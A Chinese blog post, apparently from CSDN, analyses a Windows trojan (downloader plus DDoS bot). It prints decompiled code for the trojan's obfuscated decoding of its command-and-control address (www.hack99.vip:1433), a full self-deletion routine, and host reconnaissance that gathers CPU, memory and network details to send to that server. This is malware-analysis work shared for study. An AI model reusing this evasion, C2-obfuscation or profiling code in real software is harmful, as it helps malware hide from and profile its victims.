Win32.Rootkit.Lapka.Wozw 木马病毒分析

最新推荐文章于 2021-11-04 14:18:12 发布
最新推荐文章于 2021-11-04 14:18:12 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: 原创 逆向 IDA 文章标签: 病毒 木马 逆向
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/deathmemory/article/details/72188317
版权
原创 同时被 3 个专栏收录
25 篇文章 0 订阅
订阅专栏
逆向
5 篇文章 0 订阅
订阅专栏
IDA
2 篇文章 0 订阅
订阅专栏 
By: DeathMemory
QQ: 123951548

前言

近期简单分析了一个下载者+DDos的病毒,还原了一些代码,把大家感兴趣的部分分享出来,仅供学习研究。大神请跳过。

病毒执行流程

整体流程


监控服务

服务开启后,病毒会循环尝试开启线程,获取系统信息,连接远程地址。
远程地址是 Base64(算法处理(URL:port)) -> 1NTUHdvi4NgKCh3V2tMJEhcQEEM=
解密后为:www.hack99.vip:1433

建立 socket 后就发送获取的系统信息,并开始接收返回命令。
根本返回执行相关指令,预置命令是 DDOS 相关代码。


代码还原

Base64 解密处理

int __cdecl customDecode(char *Str)
{
  int len; // [sp+0h] [bp-Ch]@1
  int i; // [sp+4h] [bp-8h]@1
  int outBuff; // [sp+8h] [bp-4h]@1

  outBuff = 0;
  len = base64_decode(Str, &outBuff);
  for ( i = 0; i < len; ++i )
  {
    *(i + outBuff) += 56;
    *(i + outBuff) ^= 123u;
  }
  return outBuff;
}

自删除完整流程

signed int deleteSelf()
{
  HMODULE hKERNEL32; // eax@1
  HANDLE hProc; // eax@2
  HANDLE hThread; // eax@2
  signed int result; // eax@2
  CHAR cmdPath[260]; // [sp+Ch] [bp-354h]@1
  char cmdDeleteSelf[260]; // [sp+110h] [bp-250h]@1
  CHAR Filename[260]; // [sp+214h] [bp-14Ch]@1
  SHELLEXECUTEINFOA exeInfo; // [sp+318h] [bp-48h]@1
  FARPROC lstrcatA; // [sp+354h] [bp-Ch]@1
  char aOpen[5]; // [sp+358h] [bp-8h]@1

  hKERNEL32 = LoadLibraryA("KERNEL32.dll");
  lstrcatA = GetProcAddress(hKERNEL32, "lstrcatA");
  Filename[0] = 0;
  memset(&Filename[1], 0, 0x100u);
  *&Filename[257] = 0;
  Filename[259] = 0;
  cmdPath[0] = 0;
  memset(&cmdPath[1], 0, 0x100u);
  *&cmdPath[257] = 0;
  cmdPath[259] = 0;
  cmdDeleteSelf[0] = 0;
  memset(&cmdDeleteSelf[1], 0, 0x100u);
  *&cmdDeleteSelf[257] = 0;
  cmdDeleteSelf[259] = 0;
  GetModuleFileNameA(0, Filename, 0x104u);
  GetShortPathNameA(Filename, Filename, 0x104u);// 转换成短形式路径
  GetEnvironmentVariableA("COMSPEC", cmdPath, 0x104u);// 从调用该函数的进程的环境变量中返回指定的变量名值的函数
                                                // 获取 cmd 绝对路径
  (lstrcatA)(cmdDeleteSelf, "/c del ");
  (lstrcatA)(cmdDeleteSelf, Filename);
  (lstrcatA)(cmdDeleteSelf, " > nul");      // 调用 cmd 删除自身
  exeInfo.lpVerb = aOpen;
  exeInfo.lpFile = cmdPath;
  exeInfo.cbSize = 60;
  exeInfo.hwnd = 0;
  aOpen[0] = 79;                                // Open
  aOpen[1] = 112;
  aOpen[2] = 101;
  aOpen[3] = 110;
  aOpen[4] = 0;
  exeInfo.lpParameters = cmdDeleteSelf;
  exeInfo.lpDirectory = 0;
  exeInfo.nShow = 0;
  exeInfo.fMask = 0x40;
  if ( ShellExecuteExA(&exeInfo) )              // 执行自删除
  {
    SetPriorityClass(exeInfo.hProcess, 0x40u);  // IDLE_PRIORITY_CLASS 只有当系统空闲时再执行
    hProc = GetCurrentProcess();
    SetPriorityClass(hProc, 0x100u);            // REALTIME_PRIORITY_CLASS
    hThread = GetCurrentThread();
    SetThreadPriority(hThread, 0xF);            // THREAD_PRIORITY_TIME_CRITICAL 设置优先级
    SHChangeNotify(4, 1u, Filename, 0);
    result = 1;
  }
  else
  {
    result = 0;
  }
  return result;
}

系统信息收集

  1. 获取语言
    使用 GetSystemDefaultUILanguage 获取语言
  2. 获取 CPU Hz
    通过注册表:"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0"~MHz读取其键值。
  3. 获取内存
    使用 GlobalMemoryStatusEx API 获取
  4. 获取网卡配置和Ip地址信息
    使用 GetAdaptersInfo 循环获取网卡信息

 
  lstrcpyA(regHardwareDes, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0");
  if ( RegOpenKeyExA(HKEY_LOCAL_MACHINE, regHardwareDes, 0, KEY_ALL_ACCESS, &phkResult) )
  {
    Find_CPU_Error[0] = 70;                     // Find CPU Error
    Find_CPU_Error[1] = 105;
    Find_CPU_Error[2] = 110;
    Find_CPU_Error[3] = 100;
    Find_CPU_Error[4] = 32;
    Find_CPU_Error[5] = 67;
    Find_CPU_Error[6] = 80;
    Find_CPU_Error[7] = 85;
    Find_CPU_Error[8] = 32;
    Find_CPU_Error[9] = 69;
    Find_CPU_Error[10] = 114;
    Find_CPU_Error[11] = 114;
    Find_CPU_Error[12] = 111;
    Find_CPU_Error[13] = 114;
    Find_CPU_Error[14] = 0;
    strcpy(storeBuff + 100, Find_CPU_Error);
  }
  else
  {
    Type = 4;
    cbData = 200;
    RegQueryValueExA(phkResult, "~MHz", 0, &Type, Data, &cbData);
    (RegCloseKey)(phkResult);
    GetSystemInfo(&SystemInfo);
    memset(&Dst, 0, 0xAu);
    MHz[0] = 77;
    MHz[1] = 72;
    MHz[2] = 122;
    MHz[3] = 0;
    sprintf(&Dst, "%d*%u%s", SystemInfo.dwNumberOfProcessors, *Data, MHz);
    strcpy(storeBuff + 100, &Dst);
  }
  memStatus.dwLength = 64;
  GlobalMemoryStatusEx(&memStatus);
  mb = memStatus.ullTotalPhys / 1024 / 1024;    // 获取内存
  mb_p = mb + 1;
  wsprintfA(storeBuff + 68, "%u MB", mb + 1, ((mb + 1) >> 32));
  SizePointer = 0;
  AdapterInfo = malloc(0x280u);
  if ( GetAdaptersInfo(AdapterInfo, &SizePointer) == ERROR_BUFFER_OVERFLOW )
  {
    free(AdapterInfo);
    AdapterInfo = malloc(SizePointer);          // 如果内存不够则重新 malloc
  }
  if ( !GetAdaptersInfo(AdapterInfo, &SizePointer) )// 获取网卡配置和Ip地址信息
  {
    while ( AdapterInfo )
    {
      if ( strcmp(AdapterInfo->GatewayList.IpAddress.String, "0.0.0.0") )
      {
        pIfTable = 0;
        pdwSize = 0;
        v11 = 0;
        sRes = GetIfTable(0, &pdwSize, 1);
        if ( sRes == ERROR_INSUFFICIENT_BUFFER )
        {
          pIfTable = operator new(pdwSize);
          if ( pIfTable )
          {
            sRes = GetIfTable(pIfTable, &pdwSize, 1);
            if ( !sRes )
            {
              for ( i = 0; i < pIfTable->dwNumEntries; ++i )
              {
                if ( pIfTable->table[i].dwOperStatus
                  && pIfTable->table[i].dwAdminStatus != IF_OPER_STATUS_DISCONNECTED
                  && pIfTable->table[i].dwIndex == AdapterInfo->Index )
                {
                  nSpeed = pIfTable->table[i].dwSpeed / 1000 / 1000;
                  if ( nSpeed < 1000 )
                  {
                    sprintf(&aSpeed, "%u Mbps", nSpeed);// 获取网速
                    strcpy(storeBuff + 132, &aSpeed);
                  }
                  else
                  {
                    sprintf(&aSpeed, "%u Gbps", nSpeed / 0x3E8);
                    strcpy(storeBuff + 132, &aSpeed);
                  }
                }
              }
            }
            operator delete(pIfTable);
          }
        }
      }
      AdapterInfo = AdapterInfo->Next;
    }
  }


deathmemory
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux平台下Rootkit木马分析与检测.pdf
09-06
Linux平台下Rootkit木马分析与检测.pdf
Win64.Rootkit.Agent.Stso内核级木马
Z_shuaishuai的博客
07-22 3880
腾讯电脑管家好像处理不了,重启5.6次还是有,直接进文件位置自己删了,玩了一晚上游戏,复查,就没有了;今早也看了一遍,也没有。 一直重启屁用没有,不如我自己动手。 昨天下午逛B站,逛着逛着,诶,视频没声了,然后QQ能用,就是网页不能连,将近差不多5分钟吧,然后就感觉有猫腻。就用腾讯管家扫了一遍。tm内核级木马,看见的时候给我吓傻了,这玩意可不是说笑的哈,卡巴斯基俺一个极度抠门的又没买,盗版的也没弄,就有一个腾讯电脑管家和win10自带的。 一个星期前自行照着B乎还是CSDN上面文章升级的w..
内核木马:Win32.Rootkit.Rogue.Tzim查杀
CSDN1887的博客
09-19 3272
今天发现win8下存在Win32.Rootkit.Rogue.Tzim内核木马.常规使用QQ管家查出来的,以为杀了重启就好了,结果一次次被检出. 切换到win8安全模式,使用QQ急救箱查杀,杀了后,正常重启.还是被QQ管家检出. 然后换其他比如贝壳木马查杀,卡巴斯基的木马查杀,连病毒都没检出. 最后使用金山顽固病毒木马查杀,结果删除了.重启后QQ管家也没没检出. 虽然此软件说明不支持win8,但还...
rootkit模拟木马病毒
ILP-Linux的博客
02-14 6535
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 在我们生活中,经常看的电视剧谍战片里有一个必不可少的人物——卧底。它的职责就是:良好的伪装使得对手对此长时间毫无察觉;他赢得敌人的信任并因此身居要职,这使得他能够源源不断地获取重要情报并利用其独特渠道传送回去。https://...
Trojan.win32.StartPage.amg病毒解决方案
congsikuai0611的博客
11-19 741
中这个病毒几天了,一直没有处理。今天找到答案了:Trojan.win32.StartPage.amg病毒在11月11号发作.下面来看看为什么这个流氓会在11月11日这天突然大面积爆发 该篡改模块会检测当前时间是否在2006年11...
木马病毒制作及分析
qq_45785457的博客
11-04 1万+
实验目的 本次实验为考核实验,需要独立设计完成一次网络攻防的综合实验。设计的实验中要包括以下几个方面内容: (1) 构建一个具有漏洞的服务器,利用漏洞对服务器进行入侵或攻击; (2) 利用网络安全工具或设备对入侵与攻击进行检测; 【注意事项】 1.本病毒程序用于实验目的,面向实验演示,侧重于演示和说明病毒的内在原理,破坏功能有限。在测试病毒程序前,需先关闭杀毒软件的自动防护功能或直接关闭杀毒软件。 2.若在个人电脑上实验,最好在虚拟机中运行。 3.测试完毕后,请注意病毒程序的清除,以免误操作破坏
windows xp隐藏进程 源代码.rootkit技术
01-24
windows xp隐藏进程 源代码.zip
fu-rootkit.rar
12-20
fu-rootkit.rar
PC Hunter恶意代码检测 虚拟机脱壳. Rootkit检测 木马检测
04-07
PC Hunter是一个Windows系统信息查看软件,同时也是一个手工杀毒辅助软件。目前软件支持xp~win10的所有32位操作系统,还支持64位的Win7、Win8、Win8.1和Win10系统
cnnic.rar_rootkit
09-20
这是一个rootkit 的驱动程序,研究底层的人员可要注意啊
360安全浏览器资源包
11-18
很好的浏览器!功能齐全,防病毒,实用简捷方便!希望大家多多支持!
qqkavQQ木马病毒专杀工具
11-17
Q病毒专杀工具XP--QQKav是由国内共享软件作者喃哥开发的一款专门查杀腾讯QQ自动发消息病毒木马及反黄的软件。QQKav不仅具有带毒杀毒、准确度高、闪电查杀、无须重启等特点,实时监视注册表,保护系统安全。并还提供能够有效屏蔽不健康及恶意网站的监控过滤功能,可以有效地防止恶意网址的打开,拒木马病毒于门外。另可用于屏蔽广告及IE插件弹窗、修补IE木马后门漏洞。此外,软件界面美观,使用简单,无需安装,属于绿色环保软件。(网吧版附带广告弹窗屏蔽、服务器时间校正、网吧辅助管理等功能。)提示:本软件界面可以选择是否进行主页修改,可勾选后进行使用。
解决灰鸽子变种、Rootkit.Win32.Vanti、Win32.Delf、Win32.Small等
Purpleendurer@CSDN
08-17 3154
endurer 原创2006-08-17 第1版一位网友的电脑,这两天瑞星开机扫描总报告发现Backdoor.Gpigeon.uql。如:/------------病毒名称 处理结果 发现日期 路径文件病毒来源Backdoor.Gpigeon.uql 清除成功  2006-08-15 18:08 IEXPLORE.EXE>>C:/Program Files/Internet Explorer/
Windows Rootkit 技术分析
斑竹的程序设计专栏
11-29 1476
现在很多人对rootkit认识不够,可以说空白。而此文的目的就是让大家认识rootkit→了解rootkit。也让一些想研究它的人把这篇文章当作一个参考或是入门级的指导。************************************************************转载请保留文章完整,谢谢! *Date:2005/9/11 祝童童生日快乐。也纪念世贸大厦 *作者:sunwe
【解决】:不能删除旧版本的Apple Software Update
热门推荐
DeathMemory的专栏
12-14 3万+
不能删除旧版本的Apple Software Update 不能重新安装  itunes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products 搜索 :AppleSoftwareUpdate.msi  回溯到 Products 下的数字目录,整体删除。 再重新安装 itunes 就可以了。
关于如何区分Android手机是32位还是64位
DeathMemory的专栏
08-11 3万+
adb pull /system/bin/cat cat$ file cat cat: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically link ed, interpreter /system/bin/linker, BuildID[md5/uuid]=347de8c56cb952f62b916d14
IDA 调试 Android 方法及简单的脱壳实现
DeathMemory的专栏
05-24 1万+
本文参考了一些网络文章,对大大们的技术分享表示感谢。小弟刚刚开始深入去搞Android的逆向不久,写一下学习笔记,希望能抛砖引玉,给新手同学们带来方便。文中如有不对的地方还请留言指正。 前置环境 JDK,IDA PRO,Android NDK,Android Killer,JEB,Root并开启开发者模式USB调试的手机 动态启动调试 Android Killer 编译 x.apk
破解 jar 包之直接修改 .class 文件方式
DeathMemory的专栏
11-29 1万+
一、常规 JAVA 软件破解流程 先讲一下常规软件破解流程。 1. 快速定位。          1) 通过procmon监控相关软件,查看程序都访问了些啥。          2) 用jd-gui反编译 jar 包,得到源码。          3) 搜索关键字以定位。 这种定位方法只是千万种中的一种,根据不同软件的不同执行特性再具体实施不同的定位方案。 2. 修改破解。 1)
C++ 获取其它进程命令行参数
DeathMemory的专栏
12-11 7306
wintenl.h 下载地址 #include "stdafx.h" #include "winternl.h" typedef NTSTATUS (WINAPI *NtQueryInformationProcessFake)(HANDLE, DWORD, PVOID, ULONG, PULONG); NtQueryInformationProcessFake ntQ = NU
如何检测linux rootkit病毒
最新发布
03-21
检测 Linux Rootkit 病毒的方法有很多种,以下是一些常见的方法: 1. 使用 Rootkit Hunter 工具进行扫描和检测 2. 使用 Chkrootkit 工具进行扫描和检测 3. 使用 rkhunter 工具进行扫描和检测 4. 使用 Lynis 工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值